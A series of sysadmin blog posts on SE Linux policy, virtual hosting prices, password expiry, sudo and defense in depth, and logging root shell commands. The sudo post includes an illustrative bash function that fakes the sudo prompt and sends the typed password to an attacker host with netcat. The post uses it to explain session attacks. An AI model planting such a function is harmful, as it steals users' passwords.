New SE Linux Policy for Squeeze

I have just uploaded refpolicy version 0.2.20100524-1 to Unstable. This policy is not well tested (a SE Linux policy package ending in “-1” is not something that tends to work well for all people) and in particular lacks testing for Desktop environments. But for servers it should work reasonably well.

I expect to have a better version uploaded before this one gets out of Unstable.

Note that the selinux-policy-default package in this release lacks support for roles, it’s a targeted policy only. I plan to fix this soon.

Can you run SE Linux on a Xen Guest?

I was asked “Can you run SELinux on a XEN guest without any problem?”. In a generic sense the answer is of course YES, Xen allows you to run Linux kernels with all the usual range of features and SE Linux isn’t a particularly difficult feature to enable. I do most of my SE Linux development and testing on virtual machines and until recently I didn’t have any hardware suitable for running KVM, so in the last few years I’ve done more SE Linux testing on Xen than on non-virtual machines. My SE Linux Play Machine [1] (which will be online again tomorrow) is one SE Linux system running under Xen.

But the question was asked in the context of my blog post comparing the prices of virtual hosting providers [2], which changes things.

Both Linode and Slicehost (the two virtual hosting providers that my clients use) provide kernels without SE Linux support, the command “grep selinux /proc/filesystems” (which is the easiest way to test for SE Linux support) gives no output. I am not aware of any other virtual hosting company that provides SE Linux support.
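
The check is trivial to script; a minimal sketch:

    # prints a line such as "nodev selinuxfs" if the kernel supports SE Linux
    if grep -q selinux /proc/filesystems; then
        echo "this kernel supports SE Linux"
    else
        echo "no SE Linux support in this kernel"
    fi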

If anyone knows of a virtual hosting company that runs Xen or KVM virtual machines with SE Linux support then please let me know, I’ll write a blog post comparing such companies if there are some.

For the people who work at ISPs: If your company supports SE Linux virtual machines then I would be happy to review your service, just give me a free DomU for a couple of weeks so I can test it out. If your company is considering offering such virtual machines then I would be happy to have a confidential discussion about the issues that you will face. While I am available for paid consulting work in this area, I am more than happy to spend an hour or two helping a company that’s going to help support my favorite free software project without expecting to be paid. But I have to note that if a dozen hosting companies happen to want advice I won’t be able to provide two hours of free advice to each of them.

I think that there is an unsatisfied market demand for SE Linux virtual machines. I don’t expect all virtual hosting companies to support it in the near future, but this will make it more profitable for those that do. If for the sake of discussion we assume that 5% of sysadmins who are making purchasing decisions regarding virtual servers really want to have SE Linux support and if 5% of virtual hosting companies were to offer such support, then those hosting companies would almost double their market share as a result of supporting SE Linux. It’s the usual economic factors relating to small companies that profit from providing good support for the needs of a minority of customers.
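
To make the arithmetic behind that estimate explicit (assuming the SE Linux-demanding customers buy only from the companies that offer support, and that those companies start with a proportional 5% of the market):

    # normal share of the ordinary 95% of customers, plus all of the 5%
    # of customers who demand SE Linux support
    echo '0.05 * 0.95 + 0.05' | bc -l    # .0975 - nearly double the 5% baseline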

Virtual Hosting Prices

Linode has just announced a significant increase in the amount of RAM in each of their plans [1].

The last time I compared virtual hosting prices in a serious manner was over two years ago [2], so it seems like a good time to compare the prices again.

Now there are some differences between these providers that make things difficult to compare. Gandi used to not include the OS in the disk allocation (presumably they did de-duplication); I’m not sure if they still do that. OpenVZ/Virtuozzo and Xen can’t be directly compared: OpenVZ is operating-system-level virtualisation that allows virtual machines to share resources to some extent, which should allow better overall utilisation of the system but may allow someone to hog more resources than they deserve – I prefer real virtual machines so I tend to avoid it. Virtuozzo is a technology I’m not familiar with, so all other things being equal I would choose Xen because I know it better.

Years ago Vpsland deleted one of my DomUs without good notification and without keeping a backup and I’m not about to forgive them. XenEurope and Gandi get good reviews, but I have no personal experience with them so in my personal ranking they are below Linode and Slicehost.

RapidXen offers native IPv6 – a very noteworthy feature. But they are quite expensive.

Note that I have only included providers that advertise in English. I could use Google translation to place an order on a non-English web site but I am not going to risk a situation where Google translation is needed for technical support.

In the price comparison tables I have used $US for price comparisons; where the price was advertised in another currency I put the $US price in brackets. For every provider that doesn’t advertise prices in $US I used XE.com to get a spot price. Note that if you convert between currencies you will not get that rate. I used the spot rate because most of my readers don’t use the $US as their native currency – they neither live in a country that uses it nor have business interests based on it – and converting from $AU to $US has about the same overhead for me as converting to the Euro or the pound.

The bandwidth is listed as either a number of Gigabytes per month that can be transferred or as a number of Megabits per second that the connection may use.

I have tried to roughly order the offerings based on how good they seem to be. But as there are so many factors to consider it’s quite obvious that no provider can be considered to be universally better than the others.

The biggest surprise for me was how well Xen Europe compares to the others. Last time I did the comparison they were not nearly as competitive.

Finally note that I am comparing the options for low-end servers. These are services that are useful for hobbyist use and low-end servers for commercial use. Some providers such as Xen Europe exclude themselves from consideration for serious commercial use by not offering big servers – Xen Europe only supports up to 1GB of RAM.

Prices of Xen virtual servers:

ISP RAM Disk Bandwidth Price
XenEurope 128M 10G 1TB €5 ($6.15)
XenEurope 512M 30G 1TB €17.50 ($21.52)
Linode 512M 16G 200GB $20
RackVM 128M 10G 100GB £4 ($5.90)
RackVM 512M 30G 300GB £16 ($23.62)
Slicehost 256M 10G 150GB $20
Slicehost 512M 20G 300GB $38
Gandi 256M 8G 5Mb/s $16
Gandi 512M 16G 10Mb/s $32
RapidXen 256M 20G 2Mb/s $20
RapidXen 512M 20G 2Mb/s $30
Rimuhosting 160M 4G 30GB $20
Rimuhosting 400M 8G 150GB $30

Prices of non-Xen virtualisation systems:

ISP Virtualisation RAM Disk Bandwidth Price
Quantact OpenVZ 256M 15G 300GB $15
Quantact OpenVZ 512M 35G 600GB $35
FreeVPS VMWare 256M 10G 100GB £10 ($14.76)
FreeVPS VMWare 512M 20G 200GB £15 ($22.14)
Vpsland Virtuozzo 512M 10G 250GB $20
Vpsland Virtuozzo 1024M 20G 500GB $35

Update: Added RackVM to the listing, and removed the ambiguous part about Gandi disk allocation.

Carpal Tunnel – Getting Better

Three months ago I wrote about getting Carpal Tunnel Syndrome [1]. A few weeks after that I visited the specialist again and had my wrist brace adjusted to make it a little less uncomfortable. The specialist also gave me some quick ultra-sound treatment and then said that if it didn’t get better in a month or two then I should just get a referral to a surgeon!

I didn’t have a bad case – some people have their hand muscles atrophy. My hand strength was measured as 50kg in my left hand (the one with CTS) and 52kg in my right hand. The greater strength in my right hand is probably more due to the lack of left-handed tools and sporting equipment than any muscle atrophy. This is slightly better than the physical standards for the Victoria Police (just over 50kg average for both hands) [2] and a lot better than the Australian Federal Police physical standards of 45kg for the dominant hand and 40kg for the non-dominant [3].

Really my hand strength should have been recorded as 490 Newtons and 510 Newtons respectively; medicine is the science of healing, and in all branches of science the Newton is the unit of force.
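
For anyone who wants to check the conversion, it’s just multiplication by standard gravity (9.80665 m/s^2):

    echo '50 * 9.80665' | bc    # 490.33250 - left hand
    echo '52 * 9.80665' | bc    # 509.94580 - right hand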

Over the past few months my hand seems to have recovered a lot while wearing the wrist-brace 24*7. I’ve just started going without the wrist-brace during the day and it seems to be OK. I’m currently planning to wear the wrist brace at night for a year or two as it’s the only way to ensure that my hand doesn’t end up on a bad angle when I’m asleep.

At this stage it seems that I’ve made as close to a full recovery from CTS as is possible!

Should Passwords Expire?

It’s widely believed that passwords should be changed regularly. The Australian government declared last week to be “National Cyber Security Awareness Week” [1] and has published a list of tips for online security which includes “Get a stronger password and change it at least twice a year”.

Can a Password be Semi-Public?

Generally I think of a password as being either secret or broken. If a password is known to someone other than the sysadmin and the user who is authorised to use the account in question then you have potentially already lost all your secret data. If a password is disclosed to an unauthorised person on one occasion then merely changing the password is not going to do any good unless the root cause is addressed; otherwise another unauthorised person will probably get the password at some future time.

Hitachi has published a good document covering many issues related to password management [2]. I think it does a reasonable job of making sysadmins aware of some of the issues but there are some things I disagree with. I think it should be used as a list of issues to consider rather than a list of answers. The Hitachi document lists a number of ways that passwords may be compromised and suggests changing them every 60 to 90 days to limit the use of stolen passwords. This seems to imply that a password is something whose value slowly degrades over time as it’s increasingly exposed.

I think that the right thing to do is to change a password if you suspect that it has been compromised. There’s not much benefit in having a password if it’s going to be known by unauthorised people for 89 days before being changed!

Fundamentally a password is something that can have its value rapidly drop to zero without warning. It doesn’t wear out.

Why are terms such as Three Months used for Maximum Password Ages?

The Hitachi document gives some calculations on the probability of a brute-force attack succeeding against a random password with 90 days of attacking at a rate of 100 attempts per second [2]. I think that if a service is run by someone who wouldn’t notice the load of 100 attempts per second then you have bigger security problems than the possibility of passwords being subject to brute-force attacks. Also it’s not uncommon to have policies to lock accounts after as few as three failed login attempts.
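
A rough sketch of that kind of calculation (the numbers here are mine, not Hitachi’s – an 8 character random alphanumeric password is assumed):

    # guesses possible at 100 attempts/sec over 90 days
    echo '100 * 86400 * 90' | bc                # 777600000
    # key space of a random 8 character password from 62 alphanumerics
    echo '62^8' | bc                            # 218340105584896
    # fraction of the key space searched in those 90 days
    echo '(100 * 86400 * 90) / 62^8' | bc -l    # about 0.0000036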

Rumor has it that in the early days of computing when the hashed password data was world readable someone calculated that more than 3 months of CPU time on a big computer would be needed to obtain a password by brute-force. But since then the power of individual CPUs has increased dramatically, computers have become cheap enough that anyone can easily gain legal access to dozens of systems and illegal access to a million systems, and it has become a design feature in every OS that hashed passwords are not readable by general users. So the limiting factor is to what degree the server restricts the frequency of password guesses.

I don’t think that specifying the minimum password length and maximum password age based on the fraction of the key space that could be subject to a brute-force attack makes sense.

I don’t think that any attempt to make an industry-wide standard for the frequency of password changes (as the government is trying to do) makes sense.

Can there be a Delay between a Password being Compromised and being Used by an Attacker?

Hypothetically speaking, if a password was likely to be compromised (EG by having the paper it was written on lost or stored insecurely) for some time before an attacker exploited it, then changing the password during that period would solve the problem. For example when a company moves office there is the possibility of notepaper with passwords being lost. So if the sysadmin caused every user password to expire at the time of the move then a hostile party would be unable to gain access.
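
On a typical Linux system a bulk forced change is easy to script; a minimal sketch (the user names are hypothetical – in practice you would select the real accounts affected by the move):

    # force a password change at the next login for each affected user
    for u in alice bob carol; do
        chage -d 0 "$u"    # last-change date set to the epoch, so the password has "expired"
    done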

Another possibility is the theft of backup tapes that contain the list of unencrypted passwords. If users change their passwords every three months then the theft of some four month old backup tapes will be less of a problem.

Another possibility concerns the resale of old computers, phones, and other devices that may contain passwords. A reasonably intelligent user won’t sell their old hardware as soon as the replacement device arrives, they will want to use the new device for some time to ensure that it works correctly. If passwords expire during this trial period with the new device then passwords stored in the old device won’t have any value. The down-side to this idea is that people probably sell their old gear fairly quickly and making passwords expire every two weeks would not be accepted well by the users.

It seems to me that having bulk password changes (all passwords for one user or for one company) based on circumstances that lead to potential insecurity would do more good than changing passwords at a fixed schedule.

How are Passwords typically Compromised?

Dinei Florêncio and Cormac Herley of Microsoft Research and Baris Coskun of Brooklyn Polytechnic University wrote a paper titled “Do Strong Web Passwords Accomplish Anything?” [3] which discusses this issue. The first thing that they note is that nowadays passwords are most commonly compromised by phishing and keylogging. In those cases passwords are typically used shortly after they are stolen and the strength of a password never does any good. That paper suggests that banks should use stronger user-names rather than stronger passwords to combat the threat of bulk brute-force attacks.

Can a Password Last Forever?

If a password is entered in a secure manner, authenticated by a secure server, and all network links are encrypted or physically protected then there should never be a need to change it.

Of course nothing is perfectly secure, so for some things with minimal short-term value or which can be used without anyone noticing there is a benefit in changing the password. But in the case of Internet banking if a hostile party gets your login details then you will probably know about it in a few days when the bank calls you about the unusual transactions from foreign countries – long before a 90 day password change schedule would have done any good.

Maybe one of the issues determining whether a password should be changed regularly is whether an attacker could use long-term read-only access to gain some benefit. Being able to read all the email someone received for a year could be a significant benefit if that person was a public figure, and there’s usually no way for an ISP customer to know that someone else is downloading all their mail via POP or IMAP.

Should a Password be the only Authentication Method?

It is generally agreed that an authentication method should ideally involve something you have plus something you know. That means a password and a physical device such as a smart card, token with a changing sequential password, or a key such as a Yubikey [4]. If the physical device can’t be cloned (through some combination of technical difficulty and physical access control) then it significantly improves security. When a physical device is used the purpose of the password is merely to stop someone who steals the physical device from immediately exploiting everything – the password only has to be strong enough to keep the accounts secure until a new token can be issued.

The combination of something you have and something you know is very strong. Even having a physical token stored on the desk next to the PC that is used for logging in provides a significant benefit: an attacker then needs to break in to the house, and can’t just sniff the password by compromising the PC remotely.

Conclusion

In all aspects of security you need to consider what threats you face. If an attacker is likely to launch an immediate noisy attack (such as transferring the maximum funds out of an Internet banking account) then changing the password regularly won’t do any good. If a subtle long-term attack is expected then changing the password can do a lot of good – but a physical token is the ideal if the account is valuable enough.

But to put things into perspective, it’s technically possible to use a mobile phone camera at close range (or an SLR with a big lens at long range) to take a photo of keys in enough detail to reproduce them. But this hasn’t stopped people from carrying their house keys in an obvious manner that permits photography or leaving them on their desk at work. Also I’ve never heard of anyone routinely changing the door locks in case a hostile party might have got a key – although I’m sure that such practices are common in highly secure locations. Few people even take their house keys off the key-ring when they have their car serviced!

Related Posts

Defense in Depth and Sudo – when using sudo can increase security and when it can’t.
Logging Shell Commands – how to log what the sysadmin does and what benefits that provides you; it doesn’t help if the sysadmin is hostile.
Logging in as Root – should you login directly as root?

Defense in Depth and Sudo

My blog post about logging in as root and whether sudo provides any benefit [1] got some interest on Reddit. In the Reddit comments on my post [2] there are a lot of strange things. One interesting comment was to suggest that logging in as non-root provided “defense in depth”.

The NSA is credited with inventing the term “Defense in Depth” as applied to the computer industry; they have a PDF that gives an overview of the concept [3]. It seems that Defense in Depth is all about having multiple different layers of security: firewalls, IDS/IPS, passwords, PKI, etc. Entering the same password twice (once to login and once to run sudo – which seems to be a fairly typical configuration of sudo) hardly seems to count.

Can using sudo provide Defense in Depth benefits?

With a typical configuration the use of sudo provides no real protection. The user either enters their own password or the root password to gain full root access, in either case the attacker can exploit their session and get the password. A session exploit can be easily arranged by creating a shell function or alias that makes sudo run something else (such as using netcat to send the password out over the network).
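
To illustrate how little effort such a session exploit takes, here is a sketch of a hostile shell function that could be planted in the victim’s shell startup files (the destination host is made up):

    # shadows the real sudo: captures the password, sends it over the
    # network with netcat, then runs the real command so nothing looks wrong
    sudo() {
        read -s -p "[sudo] password for $USER: " pw; echo
        echo "$pw" | nc attacker.example.com 4444    # hypothetical attacker host
        echo "$pw" | command sudo -S "$@"
    }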

One way of making this sort of attack more difficult is to make root own the user home directory, files such as ~/.login that are used by the user shell, the ~/.ssh directory and the ~/.ssh/authorized_keys file. This way a hostile party can’t change the configuration, so a successful attack has to involve a long running process that uses ptrace to intercept the shell and divert an attempt to run sudo.
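
A sketch of that arrangement for a hypothetical user “fred”:

    # the login environment becomes read-only to the account itself
    chown root:root /home/fred /home/fred/.login \
        /home/fred/.ssh /home/fred/.ssh/authorized_keys
    chmod 755 /home/fred                     # fred can read but not modify
    # give fred a writable area for actual work
    mkdir /home/fred/work && chown fred /home/fred/work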

If the non-root user is prevented from using ptrace then things start to become a little more difficult for the attacker. In some quick tests I was able to capture about half the data through messing with /proc/X/fd/0 and /proc/X/fd/1 for a target process, but it seems that it would be difficult to get an entire password that way. To disable ptrace you could compile a kernel without ptrace support, use a SE Linux policy that prevents ptrace access for the sessions in question, or make the user’s shell SETGID.
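
Of those options the SETGID shell is the quickest to demonstrate; a sketch (the group name and user are made up):

    # a SETGID copy of bash: because credentials change at exec time the
    # kernel marks the process non-dumpable, so the user can't ptrace it
    groupadd sgidshell
    cp /bin/bash /bin/bash-sgid
    chgrp sgidshell /bin/bash-sgid
    chmod 2755 /bin/bash-sgid
    echo /bin/bash-sgid >> /etc/shells    # chsh requires the shell to be listed
    chsh -s /bin/bash-sgid fred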

If the root account and the account used for su or sudo use different authentication methods – where the options include ssh authorized keys, password, and security token (maybe both password and token for the root account) – then it does seem that there would be some Defense in Depth benefit.

sudo can be used to only permit executing certain commands. While this is a real security benefit it doesn’t allow full sysadmin work, merely delegating some portions of operations to people who don’t have full sysadmin rights. As someone needs to be able to fix any problem that might occur on the machine, someone needs to be able to run any command as root. So while sudo is great for providing limited administrative access to certain junior people, it’s not going to stop an attack on a member of the sysadmin team.
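
For example a sudoers entry like the following (the user name and command list are illustrative) delegates a couple of routine tasks without granting general root access:

    # /etc/sudoers fragment - always edit with visudo
    # junior may restart apache and update the package lists, nothing else
    junior ALL = (root) /usr/sbin/invoke-rc.d apache2 restart, /usr/bin/apt-get update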

Conclusion

In a typical sudo configuration the non-root account is configured in a default Unix manner (with the user having ownership of their home directory). The user who logs in to that account controls its environment through .login and other scripts, so sudo doesn’t gain anything.

In a typical configuration ptrace is enabled so even if the critical environment files can’t be modified by a hostile party they can get the same result through ptrace. Admittedly using a SETGID shell is not going to be difficult to implement after you have changed the ownership of the home directory.

If you have a configuration where ptrace is not available and the non-root user can’t modify their own profile files then it starts to become difficult for an attacker. If root authentication requires using a security token such that every login uses a different code and the code expires rapidly then it becomes even more difficult for an attacker.

But for all configurations that are close to the default for every OS that I’ve ever used none of these conditions hold. Also none of those conditions held for any of the systems I’ve been employed to use which were configured to require su or sudo for root access.

As most sudo configurations don’t provide any extra security, and auditing the actions of the sysadmin can be done better in other ways (such as the Bash 4.1 syslog feature) [4], it seems that for the vast majority of systems sudo doesn’t provide a benefit.

The fact that sudo could provide a benefit if configured in a way that is quite different to all the defaults and the ways that it is typically used is worth noting. I’m not going to argue with anyone who wants to configure their systems in such a manner and who believes that they need to do so. But anyone who thinks that sudo is the only way to go because the Ubuntu default configuration does it really needs to investigate the issues. Remember that blind faith in the security choices of other people can be a security problem.

Links June 2010

Seth Berkley gave an interesting TED talk about developing vaccines against the HIV and Influenza viruses [1]. The part I found most interesting was the description of how vaccines against viruses are currently developed using eggs and how they plan to use bacteria instead for faster and cheaper production. One of the problems with using eggs is that if the chickens catch the disease and die then you can’t make a vaccine.

Aigars Mahinovs wrote a really good review of Microsoft Azure and compared it to Amazon EC2 [2]. It didn’t surprise me that Azure compared poorly to the competition.

Johanna Blakley gave an insightful TED talk about IP lessons from the fashion industry [3]. She explained how an entire lack of IP protection other than trademark law was an essential part of the success of the fashion industry. She also compared the profits in various industries and showed that industries with little or no IP protection involve vastly larger amounts of money than industries with strong IP protection.

Lisa D wrote an insightful post about whether Autism Spectrum Disorders (such as Asperger Syndrome) should be considered to be disabilities [4]. I don’t entirely agree with her, but she makes some really good points.

Sharmeen Obaid-Chinoy gave an interesting TED talk about the way the Taliban train young children to become suicide bombers [5]. Apparently the Taliban prey on large poor families, sometimes paying the parents for taking children away to “school”. At the Taliban schools the children are beaten, treated poorly, and taught theology by liars who will say whatever it takes to get a result. Then after being brain-washed they are sent out to die.

Wired has an interesting article about Charles Komanoff’s research into New York traffic problems [6]. He aims to track all the economic externalities of traffic patterns and determine incentives to encourage people to do things that impose lower costs on the general economy. His suggestions include making all bus travel free as the externality of the time spent collecting fares is greater than the fare revenue. It’s a really interesting article; his research methods should be implemented when analysing traffic in all large cities, and many of his solutions can be implemented right now without further analysis – such as free buses and variable ticket pricing according to the time of day.

William Li gave an interesting TED talk about starving cancer by preventing new blood vessels from growing to feed it [7]. Drugs to do this have been shown to increase the life expectancy of cancer patients by more than 100% on average. Also autopsies of people who died in car accidents show that half the women in their 40s had breast cancer and half the men in their 50s had prostate cancer, but those cancers didn’t grow due to a natural lack of blood supply, so the aim here is to merely promote what naturally happens in terms of regulating cancers and preventing them from growing larger than 0.5mm^3. There are a number of foods that prevent blood vessels growing to cancers, which include dark chocolate! ;) Drugs which prevent blood vessel growth also prevent obesity – I always thought that eating chocolate all the time prevented me from getting fat due to the central nervous system stimulants that kept me active…

Graham Hill gave an inspiring TED talk about becoming a weekday vegetarian [8]. Instead of making a commitment to being always vegetarian he’s just mostly vegetarian (only eating meat on Sundays). He saves most of the environmental cost and doesn’t feel guilty if he ever misses a day. It’s an interesting concept.

Cory Doctorow wrote an insightful article for the Guardian about the phrase “Information Wants To Be Free” [9]. He points out that really it’s people who want to be free from the tyranny that is being imposed on us in the name of anti-piracy measures. He also points out that it’s a useful straw-man for the MAFIAA to use when claiming that we are all pirates.

The Atlantic has an interesting article about the way that Google is working to save journalistic news [10].

Adam Sadowsky gave an interesting TED talk about creating a Rube Goldberg machine for the OK Go video “This Too Shall Pass” [11]. At the end of the talk they include a 640*480 resolution copy of the music video.

Brian Cox gave an interesting TED talk advocating increased government spending on scientific research [12]. Among other things he pointed out that the best research indicates that the amount of money the US government invested in the Apollo program was returned 14 times over to the US economy due to exports of new American products that were based on that research. It’s surprising that any justification other than the return on investment for the Apollo program is needed!

Moot gave an interesting TED talk about Anonymity [13]. I don’t think that he made a good case for anonymity; he cited one person being identified and arrested for animal cruelty due to the efforts of 4chan people and also the campaign against the Cult of Scientology (which has not been very successful so far).

Rory Sutherland gave an intriguing TED talk titled “Sweat the Small Stuff” [14]. He describes how small cheap changes can often provide greater benefits than huge expensive changes and advocates corporations having a Chief Detail Officer to take charge of identifying and implementing such changes.

TED hosted an interesting debate between pro and anti nuclear campaigners [15]. They agreed that global warming is a significant imminent problem but disagreed on what methods should be implemented to solve it.

Logging Shell Commands

In response to my previous post about logging in directly as root [1] it was suggested that using sudo is the only way to log the commands that are entered as root. One reason for doing this is if you don’t trust the people who are granted root access and you want to log all commands to a remote server that is run by different people. I wonder whether it is really possible to run systems with untrusted sysadmins; if someone can apply patches etc then they can surely install a trojan and then wait a while before activating it, to make things more difficult for anyone who is analysing the logs.

One of the many issues is that even the restricted version of vim permits the :r and :w commands, so one could start vim from sudo with an innocuous file as the target of the edit operation and then read and write some critical file such as /etc/shadow. I expect that someone has written an editor which has a restricted mode that doesn’t allow reading/writing files other than the one specified on the command-line, and if not it surely wouldn’t be difficult to patch vim (or your favorite editor) to have such a mode of operation. But there are always other programs that can access files other than the ones specified on their command-line. It seems that using the auditctl interface to log access to certain critical files (EG read access to /etc/shadow and write access to everything under /etc, /bin, /sbin, and /usr) would be a necessary part of an effective auditing strategy and that sudo would only comprise a small part of a useful configuration.
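
A sketch of such audit rules (the -k keys are arbitrary labels for later searching):

    # log every read of the shadow password file
    auditctl -w /etc/shadow -p r -k shadow-read
    # log every write and attribute change under the critical directories
    auditctl -w /etc -p wa -k etc-write
    auditctl -w /bin -p wa -k bin-write
    auditctl -w /sbin -p wa -k sbin-write
    auditctl -w /usr -p wa -k usr-write
    # matching records can later be retrieved with e.g.: ausearch -k shadow-read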

There are other viable ways of logging everything that is done as root which offer benefits over sudo.

Ways of Logging Shell Commands

The Korn shell supports doing all the logging you might desire as part of a shell function [2].

Bash can have a similar shell function to do the logging, but when a command is entered the previous command is logged [3]; this means that any single bash command that unsets this will never be logged. It might be possible to solve this if you know more about Bash than I do. I wonder if the Korn shell function has the same issue. This is still probably useful for some situations when you want to track what honorable sysadmins do, but of little benefit for tracking hostile sysadmins – if tracking hostile sysadmins is actually possible.
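
One common variant of the bash approach uses PROMPT_COMMAND, which runs just before each prompt is drawn – hence the one-command lag mentioned above, as a command that kills the shell is never logged:

    # log the most recent history entry to syslog before each new prompt
    export PROMPT_COMMAND='logger -p local1.notice -t "bash[$$]" "$USER: $(history 1)"'
    readonly PROMPT_COMMAND    # stops casual unsetting, but not a determined user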

You can put code in a file such as /etc/bash.bash_logout to log the commands elsewhere, but even trivial things such as “kill -9 $$” can defeat that so it’s only useful when the sysadmin is trusted.

The Sudoshell project exists to log all data that is entered in a shell [4]. One deficiency of this for the people who don’t trust the root user is that it logs the data to files on disk, but it shouldn’t be difficult to rewrite sudoscriptd to write directly to another machine over the network. One benefit of this for auditing is that it captures all the output of the commands as well (which can be a little inconvenient to decipher when curses programs are run). The web site also describes some of the problems with trying to use sudo directly for everything (such as pipelines).

If you compile Bash version 4.1 with the SYSLOG_HISTORY macro enabled (which can be done by editing the file config-top.h) then it will log all commands to syslog. RootShell.be has a short post about this which mentions the security issues: some commands take passwords as parameters, and those passwords could be exposed to the network [5]. Of course the best option is to just avoid such commands. Thanks to Chris Samuel for pointing out the Bash logging feature.
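
A sketch of the build process (the version and archive name are taken from the post; the exact formatting of the commented-out define in config-top.h may vary):

    # build bash 4.1 with history logged to syslog
    tar xzf bash-4.1.tar.gz && cd bash-4.1
    ${EDITOR:-vi} config-top.h    # uncomment the "#define SYSLOG_HISTORY" line
    ./configure && make && make install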

Conclusion

If you use sudo for auditing root access then you lose some shell functionality. Sudo also only logs the commands that are executed – you don’t get logging of output. It seems that depending on the exact requirements either a modified version of Sudoshell or the logging that can be compiled into Bash would be the way to go. The main benefit of using sudo for logging would be that some distributions of Linux are configured that way by default – but it seems unlikely that someone would go to the effort of running a separate logging server that the regular sysadmin team can’t touch and then configure their servers in a default manner.

Mailing List Meta-Discussions

It seems that most mailing lists occasionally have meta-discussions about what is on-topic, the few that don’t are the ones that have very strong moderation – authoritarian moderators who jump on the first infraction and clearly specify the rules.

I don’t recall the list of acceptable topics for any mailing list including “also discussions about what is on-topic”. As this is the Internet I’m sure that someone will immediately point out an example of such a list, but apart from the counter-example that someone will provide it seems obvious that for the majority of mailing lists a meta-discussion is not strictly on topic.

Regardless of a meta-discussion not being on-topic I don’t think there’s anything wrong with such a discussion on occasion. But if a meta-discussion is to be based on the volume of off-topic messages it would be nice if the people who advocate such a position could try and encourage the discussion in a way that reduced the number of messages. Replying to lots of messages is not a good strategy if your position is that there are too many messages.

If a meta-discussion is going to be about moving off-topic discussions to other forums that are more appropriate then it would be nice to have the meta-discussion move to another forum if possible. My previous post which advocates creating a separate mailing list for chatty messages was an attempt to move a discussion to a different forum [1]. Anyone who believes that such discussions don’t belong on a list such as debian-private is free to commit their thoughts to some place that they consider more appropriate and provide the URL to any interested parties. I think that it’s worth noting that the only comment on my previous post is one that describes how to filter mail to split the traffic from the debian-private list into different mailboxes. I had hoped that other people would write blog posts advocating their positions which would allow us to consider the merits of various ideas without the he-said-she-said element of mailing list discussions.

Most mailing lists have a policy against profanity and some go further and ban personal abuse. Therefore it seems hypocritical to advocate a strict interpretation of the rules in regard to what is on-topic while also breaking the rules regarding profanity or personal abuse. I don’t think it’s asking a lot to suggest that the small minority of messages that someone writes on the topic of a list meta-discussion should obey the set of rules that they advocate – I’m not suggesting that someone should obey all the rules all the time, just when they are trying to enforce them. Also you can argue that a list policy against profanity doesn’t preclude sending profane messages off-list, but if the off-list messages are for the purpose of promoting the list rules it still seems hypocritical to use profanity.

It is a fair point that off-topic discussions and jokes can distract people from important issues and derail important discussions. It would be good if people who take such positions would implement them in terms of meta-discussions. If the purpose of a meta-discussion is to avoid distraction from important issues then it seems like a really good idea to try and avoid distraction in the meta-discussion thread.

I wonder whether a meta-discussion can provide anything other than a source of lulz for all the people who don’t care about the issue in question. The meta-discussions in the Debian project seem to always result in nothing changing, not even when the majority of people who comment agree that the current situation is not ideal. When an almost identical meta-discussion happens regularly it seems particularly pointless to start such a discussion for the purpose of reducing off-topic content. Revisiting an old discussion can do some good when circumstances change or when someone has some new insight. I know that it’s difficult to avoid being sucked into such discussions, when I was diagnosed with AS [2] I decided to try and minimise my involvement in such discussions – but I haven’t been as successful at doing so as I had hoped.

Does Every Serious Mailing List need a Non-Serious Counterpart?

One practice that seems relatively common is for an organisation to have two main mailing lists, one for serious discussions that are expected to be relatively topical and another for anything that’s not overly offensive. Humans are inherently incapable of avoiding social chatter when doing serious work. The people who don’t want certain social interactions with their colleagues can find it annoying to have both social and serious discussions on the same list, while the people who want social discussions get annoyed when people ask them to keep discussions on topic.

Organisations that I have been involved with have had mailing lists such as foo-chat and foo-talk for social discussions that involve the same people as the main list named “foo”, as well as having list names such as “memo-list” for random discussions that are separate from a large collection of lists which demand on-topic messages.

The Debian project has some similar issues with the debian-private mailing list which is virtually required reading for Debian Developers. One complication that Debian has is that the debian-private list has certain privacy requirements (messages will be declassified after 3 years unless the author requests that they remain secret forever) which make it more difficult to migrate a discussion. You can’t just migrate a discussion from a private list to a public list without leaking some information. So it seems to me that the best solution might be to have a list named debian-private-chat which has the same secrecy requirements but which is not required reading. As debates about what discussions are suitable for debian-private have been going on for more than 3 years I don’t think there’s any reason not to publish the fact that such discussions take place.

Also it seems that every organisation of moderate scale that has a similar use of email and for which members socialise with each other could benefit from a similar mailing list structure. Note that I use a broad definition of the word “socialise” – there are a lot of people who will never meet in person and a lot of the discussions are vaguely related to the main topic.

I wonder whether it might be considered to be a best practice to automatically create a chat list at the same time as creating a serious discussion list.